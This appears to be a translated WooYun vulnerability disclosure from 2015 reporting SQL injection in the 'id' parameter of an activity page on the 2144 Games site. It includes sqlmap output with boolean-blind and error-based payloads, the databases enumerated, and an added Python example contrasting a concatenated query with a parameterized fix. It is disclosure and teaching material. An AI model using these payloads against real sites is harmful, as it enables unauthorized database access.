Vulnerability Summary

Defect ID: wooyun-2015-0141337

Title: SQL injection on 2144 Games

Vendor: 2144.cn

Author: me1ody

Submitted: 2015-09-15 18:45

Fixed: 2015-10-31 14:04

Published: 2015-10-31 14:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability Details

Disclosure status:

2015-09-15: Details sent to the vendor, awaiting vendor response
2015-09-16: Vendor confirmed; details disclosed to the vendor only
2015-09-26: Details disclosed to core white hats and relevant domain experts
2015-10-06: Details disclosed to regular white hats
2015-10-16: Details disclosed to intern white hats
2015-10-31: Details disclosed to the public

Brief description:

2144 Games (2144.cn) was founded in 2006 and is currently the most popular casual game site in China. For eight years we have held to a philosophy of serving users and putting fun first, striving to provide the richest and most up-to-date game content. Today 2144 Games has grown into a comprehensive casual gaming platform covering mini games, web games, mobile games and gaming news. 2144 Games now has nearly 100 million registered users, with more than 5 million players on 2144 every day, and these figures are refreshed daily at a delightful pace.

Detailed description:

Injection point

http://act.2144.cn/week/?id=6


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 6403=6403
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=6 AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(6081=6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
available databases [3]:
[*] act_2144_cn
[*] information_schema
[*] test
Database: act_2144_cn
[176 tables]

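To show why the `id` parameter above is injectable and how to close it, here is an added example (not from the report and not 2144's code) that runs the boolean-based blind payload from the sqlmap output against a string-concatenated lookup and against a validated, parameterized one. The `act_week` schema and rows are constructed, and SQLite stands in for the site's MySQL backend.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lookup behind /week/?id=6 (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE act_week (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO act_week VALUES (?, ?)",
        [(5, "week five"), (6, "week six"), (7, "week seven")],
    )
    return conn


def lookup_vulnerable(conn, id_param):
    """String concatenation: the raw query-string value becomes SQL syntax.
    This is the defect class the sqlmap findings above point to."""
    sql = "SELECT title FROM act_week WHERE id=" + id_param
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, id_param):
    """Reject anything that is not a plain integer, then bind the value with a
    placeholder so it can never be parsed as SQL. Returns None when rejected."""
    if not id_param.isdigit():
        return None
    rows = conn.execute("SELECT title FROM act_week WHERE id=?", (int(id_param),))
    return [row[0] for row in rows]


def boolean_blind_oracle(lookup, conn):
    """Send one true and one false condition on the id parameter, the way
    sqlmap's boolean-based blind test does. True means the two responses
    differ, i.e. the endpoint leaks a boolean oracle an attacker can read."""
    truthy = lookup(conn, "6 AND 6403=6403")  # payload quoted in the sqlmap output
    falsy = lookup(conn, "6 AND 6403=6404")   # same shape, false condition
    return truthy != falsy


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks oracle:", boolean_blind_oracle(lookup_vulnerable, db))
    print("hardened handler leaks oracle:  ", boolean_blind_oracle(lookup_safe, db))
```

Both handlers return the same row for a legitimate `id=6`; only the concatenated one changes its answer when the condition after `AND` flips, which is exactly the signal sqlmap reported.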
Proof of vulnerability:

As above

Suggested fix:

- -

Copyright notice: when reposting, please credit the source me1ody@WooYun


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-09-16 14:02

Vendor reply:

Thank you for your support of 2144's security work

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-09-16 14:45 | me1ody (Intern white hat | Rank: 82, vulnerabilities: 19 | WooYun temp worker)

    @上海剑圣网络科技有限公司 - - by the time it gets to me it's just 2 rank .....